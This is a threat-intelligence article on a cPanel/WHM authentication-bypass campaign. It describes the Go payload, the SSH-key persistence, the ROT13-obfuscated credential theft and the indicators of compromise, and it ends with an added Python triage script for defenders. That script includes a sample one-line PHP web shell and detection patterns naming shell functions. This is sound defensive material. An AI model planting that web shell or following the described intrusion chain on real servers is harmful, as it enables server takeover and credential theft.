CVE-2026-41940: Global Campaign Targets cPanel Authentication Bypass to Deploy Cross-Platform Backdoors

The threat actor known as Mr_Rot13 is actively weaponizing CVE-2026-41940—an authentication bypass vulnerability in cPanel and WHM—to distribute the "Filemanager" cross-platform backdoor. Research published by QiAnXin XLab on May 11, 2026, documents a global campaign targeting hosting servers at scale, with over 2,000 unique IP addresses participating in automated attacks against the flaw. For hosting providers and system administrators, the situation demands immediate action: vulnerable platforms must be patched and audited for compromised credentials and rogue SSH keys within hours, not days.

Key Takeaways
  • CVE-2026-41940 is an authentication bypass classified as CWE-306 within the cPanel and WHM login flow. The NVD confirms affected versions range from 11.40 to 136.0.5, and the flaw was added to the CISA KEV catalog on April 30, 2026.
  • The threat actor Mr_Rot13 automates post-exploitation using a Go-based payload that resets the root password, implants a public SSH key for persistence, and drops a PHP web shell to facilitate further infection.
  • Monitoring data reveals over 2,000 source IPs worldwide, primarily concentrated in Germany, the United States, Brazil, and the Netherlands, engaged in automated exploitation attempts.
  • The group’s command-and-control (C2) infrastructure, including the domain wrned[.]com registered in October 2020, has maintained a near-zero detection rate across security products for nearly six years.

Login Flow Bypass and Server Compromise

CVE-2026-41940 is a critical authentication flaw in the cPanel and WebHost Manager (WHM) login sequence. The National Vulnerability Database classifies it as CWE-306 (Missing Authentication for Critical Function) and lists versions 11.40 through 136.0.5 as affected. The bypass is not a remote code execution (RCE) bug in itself, but it gives an unauthenticated attacker an administrative session in the management panel, and an administrative WHM session operates with root privileges on the host. That is why the follow-on steps observed in this campaign (root password reset, SSH key implant, web shell drop) need no second exploit, and why the practical impact should be treated as equivalent to RCE.

Once access is achieved, post-exploitation is rapid and standardized. A shell script retrieves a Go payload from the domain cp.dene.[de.]com; this executable, named "Payload," resets the compromised system's root password to '123Qwe123C', a value that serves as a specific indicator of compromise (IoC) for this campaign. In the same run, the payload installs an attacker-controlled public SSH key so that access survives a later credential rotation, and plants a PHP web shell within the cPanel directory.

Go Payload Analysis: SSH Persistence and AI-Generated Logs

The executable identified by QiAnXin XLab and cited by SecurityAffairs has an unusual characteristic: its internal log messages are written in Turkish and appear to have been generated with an AI tool. The detail does not change what the code can do, but it is a potential clue about the development environment or the operators' origin. On execution, the payload immediately establishes persistence by installing an SSH key and deploying a PHP web shell for data harvesting. Because the chain is modular, Mr_Rot13 can swap individual stages without rewriting the whole toolset.

Mr_Rot13: A Long-Standing Actor with C2 Active Since 2020

Mr_Rot13 operates on infrastructure dating back to October 2020. The domain wrned[.]com, which receives exfiltrated credentials obfuscated with ROT13 (a fixed letter substitution, not encryption), already appeared in a PHP backdoor sample uploaded to VirusTotal in April 2022. The longevity is remarkable: for nearly six years, the actor's samples and domains have largely evaded detection by security engines.

"Over the six years from 2020 to the present, the detection rate of Mr_Rot13's related samples and infrastructure across security products has remained extremely low" — QiAnXin XLab researchers via The Hacker News

Researchers describe the actor as a cybercriminal operator rather than a nation-state threat. Their ability to maintain a low profile, combined with automated payload delivery, explains how a single campaign can compromise thousands of servers without triggering endpoint defense systems.

The choice of ROT13 for obfuscating exfiltrated data aligns with the actor's moniker but should not be mistaken for lack of sophistication. Behind the simple cipher lies a well-oiled infrastructure, including private Telegram channels and long-standing domains, which reduces reliance on compromised third-party hosting for C2 operations and bolsters botnet resilience.

Credential Harvesting and the 'Filemanager' Backdoor

The PHP web shell injects JavaScript into the cPanel login page to harvest credentials in real time. The harvested data is sent to wrned[.]com after ROT13 transformation. ROT13 is a trivial, keyless letter substitution rather than encryption, but it is enough to defeat a basic traffic filter that matches on plain strings, because neither the domain name nor the stolen fields appear in their original spelling on the wire. Sensitive information targeted includes bash history, SSH data, device specifications, database passwords, and cPanel virtual aliases.

Exfiltrated data is routed to a Telegram group controlled by the user '0xWR'. From the same infrastructure, the domain wpsock[.]com hosts the "Filemanager" backdoor. This tool is cross-platform, compatible with Windows, macOS, and Linux, providing the operator with file management capabilities, remote command execution, and an interactive shell, effectively turning the compromised server into a permanent access node.

In-the-Wild Exploitation and Global Attack Surface

Active exploitation has been independently verified by watchTowr, which released a tool to identify vulnerable instances. The Shadowserver Foundation has flagged thousands of cPanel installations potentially exposed to the internet. According to QiAnXin XLab data, more than 2,000 source IPs are involved in automated attacks, though it remains unconfirmed if Mr_Rot13 controls the entire volume. The same CVE is likely attracting various operators interested in cryptomining, ransomware, or botnet expansion.

The vast attack surface is a result of cPanel’s ubiquity in the global shared and dedicated hosting market. The thousands of exposed instances reported by Shadowserver amplify the risk of cascading compromises: a single breached server can host hundreds of websites and corporate databases, turning a local authentication bypass into a multi-tenant disaster.

SecurityAffairs has also reported attacks against government and military institutions in Southeast Asia, with an estimated 4.37 GB of sensitive data stolen. However, it is not yet clear if these specific incidents are directly linked to Mr_Rot13 or other threat actors exploiting the same vulnerability.

Response and Mitigation Strategies

  • Verify immediately whether cPanel/WHM instances fall within the vulnerable version range (11.40 to 136.0.5) and apply the vendor's security updates outside the normal maintenance window.
  • Rotate all root and administrative credentials, remove unauthorized SSH keys from authorized_keys files, and check whether the root password has been set to '123Qwe123C' or changed at a time nobody on the team can account for, both indicators associated with the Mr_Rot13 campaign.
  • Inspect cPanel directories for unauthorized PHP web shells and compare the login page's JavaScript against a clean install for injected scripts. Monitor network traffic for connections to wrned[.]com, wpsock[.]com, and the payload-staging domain cp.dene.[de.]com.
  • Use the watchTowr identification tool to scan for vulnerable hosts and review WHM access logs for unauthenticated or anomalous sessions going back several weeks.
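The post-exploitation chain (root password reset, SSH key implant, PHP web shell) and the ROT13-obfuscated credential exfiltration described earlier, together with the audit steps in the list above, can be turned into a small offline triage script. The following Python is an added example written for this page; it is not code from the article, from QiAnXin XLab, or from cPanel. It assumes the administrator has copied /etc/shadow, the relevant authorized_keys files, the login page HTML and the PHP files under the cPanel tree to an analysis host; the SAMPLE_* inputs, the cPanel paths and the trusted host name cpanel.example.test are constructed for demonstration. The one detail the prose alone does not show is why ROT13 matters operationally: the script matches both the plain and the rotated spelling of each C2 domain, so wrned[.]com is also caught when it travels as jearq.pbz.

```python
"""Offline IoC audit for the CVE-2026-41940 / Mr_Rot13 chain.

Added example, not code from the original article or from QiAnXin XLab.
Indicators (C2 domains, web-shell placement, SSH-key implant, root password
reset) are the ones the article reports; the SAMPLE_* inputs at the bottom
are constructed, and the cPanel paths are illustrative.
Assumption: /etc/shadow, authorized_keys, the login page HTML and the PHP
files have been copied off the suspect host for analysis.
"""
import codecs
import re
from datetime import date, timedelta

# C2 / exfil domains the article reports (undefanged so string matching works).
KNOWN_DOMAINS = ("wrned.com", "wpsock.com")
# PHP calls legitimate cPanel theme files do not normally make: a cheap web-shell heuristic.
WEBSHELL_FUNCS = ("eval", "base64_decode", "system", "passthru", "shell_exec", "assert")


def rot13(text):
    return codecs.encode(text, "rot_13")


def domain_variants(domains=KNOWN_DOMAINS):
    """Map plain and ROT13 spellings back to the canonical domain.
    A filter that only knows 'wrned.com' never sees 'jearq.pbz'."""
    variants = {}
    for d in domains:
        variants[d] = d
        variants[rot13(d)] = d
    return variants


def scan_text_for_iocs(text, domains=KNOWN_DOMAINS):
    """[(matched_spelling, canonical_domain)] for every C2 name found in text."""
    return [(v, c) for v, c in domain_variants(domains).items() if v in text]


def find_injected_scripts(html, trusted_hosts):
    """External <script src=...> on the login page whose host is not trusted."""
    bad = []
    for src in re.findall(r'<script[^>]+src=["\']([^"\']+)', html, flags=re.I):
        m = re.match(r"^(?:https?:)?//([^/]+)", src)  # only absolute URLs carry a host
        if m and m.group(1).lower() not in trusted_hosts:
            bad.append(src)
    return bad


def unknown_ssh_keys(authorized_keys_text, known_key_blobs):
    """Lines whose key material is not on the admin's allowlist (handles leading options)."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        blob = next((parts[i + 1] for i, tok in enumerate(parts[:-1])
                     if tok.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if blob not in known_key_blobs:
            unknown.append(line)
    return unknown


def root_password_changed_since(shadow_text, since):
    """True if root's last password change (shadow field 3, days since epoch) is on/after `since`."""
    for line in shadow_text.splitlines():
        f = line.split(":")
        if len(f) > 2 and f[0] == "root" and f[2].isdigit():
            return date(1970, 1, 1) + timedelta(days=int(f[2])) >= since
    return False


def suspicious_php(sources):
    """sources: {path: php_source}. Paths whose code calls web-shell style functions."""
    pat = re.compile(r"\b(" + "|".join(WEBSHELL_FUNCS) + r")\s*\(", re.I)
    return sorted(p for p, src in sources.items() if pat.search(src))


# ---- constructed sample inputs (not real captures) ----
SAMPLE_LOGIN_HTML = """<html><head>
<script src="/login.js"></script>
<script src="https://jearq.pbz/l.js"></script>
</head><body><form id="login_form"></form></body></html>"""
SAMPLE_AUTHORIZED_KEYS = """ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOpsAdminKeyConstructed admin@host
no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAttackerKeyConstructed root@payload
"""
SAMPLE_SHADOW = "root:$6$constructed$notarealhash:20584:0:99999:7:::\n"  # day 20584 = 2026-05-11
SAMPLE_PHP = {
    "/usr/local/cpanel/base/frontend/jupiter/index.php": "<?php echo 'ok'; ?>",
    "/usr/local/cpanel/base/frontend/jupiter/.cache.php": "<?php eval(base64_decode($_POST['c'])); ?>",
}


def run_demo():
    """Run every check over the sample inputs and return the findings."""
    return {
        "c2_hits": scan_text_for_iocs(SAMPLE_LOGIN_HTML),
        "injected_scripts": find_injected_scripts(SAMPLE_LOGIN_HTML, {"cpanel.example.test"}),
        "unknown_keys": unknown_ssh_keys(SAMPLE_AUTHORIZED_KEYS,
                                        {"AAAAC3NzaC1lZDI1NTE5AAAAIOpsAdminKeyConstructed"}),
        "root_pw_changed": root_password_changed_since(SAMPLE_SHADOW, date(2026, 4, 30)),
        "suspicious_php": suspicious_php(SAMPLE_PHP),
    }


if __name__ == "__main__":
    for name, finding in run_demo().items():
        print(f"{name}: {finding}")
```

Checking the root hash against the reported password needs the system's crypt implementation rather than pure Python: on a host with OpenSSL 1.1.1 or later, `openssl passwd -6 -salt <salt-from-shadow> 123Qwe123C` reproduces a SHA-512 crypt hash that can be compared byte for byte with the root entry (hosts using yescrypt need a crypt-aware tool instead). The `root_password_changed_since` check is the weaker but hash-agnostic alternative: a root password change dated after the CISA KEV addition that no administrator performed is itself a finding.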

The CVE-2026-41940 campaign shows that even a mature platform like cPanel can become a focal point for long-term persistence when a single bypass meets an actor capable of staying invisible for years. The most concerning factor is not the attack volume but the dwell time: infrastructure active since 2020 with minimal detection suggests that many past compromises went completely unnoticed. For hosting providers, the priority is no longer just patching, but a thorough historical audit of their systems.

Frequently Asked Questions

Is the Filemanager backdoor limited to Linux servers?

No. Analysis by QiAnXin XLab indicates that the Filemanager backdoor distributed via wpsock[.]com is cross-platform, supporting Windows, macOS, and Linux with features for file management and remote command execution.

Are the 2,000+ attacking IPs all controlled by Mr_Rot13?

This is unconfirmed. While over 2,000 IPs are actively exploiting the CVE, this figure likely includes multiple threat actors using the flaw for diverse purposes, including botnet recruitment and cryptomining.

Can standard security tools detect the PHP web shell?

Only partially. Targeted inspection of cPanel directories and JavaScript analysis of the login page are required, as the payload is modular and indicators may vary between different phases of the campaign.

Information has been verified against cited sources and is current as of the time of publication.

Sources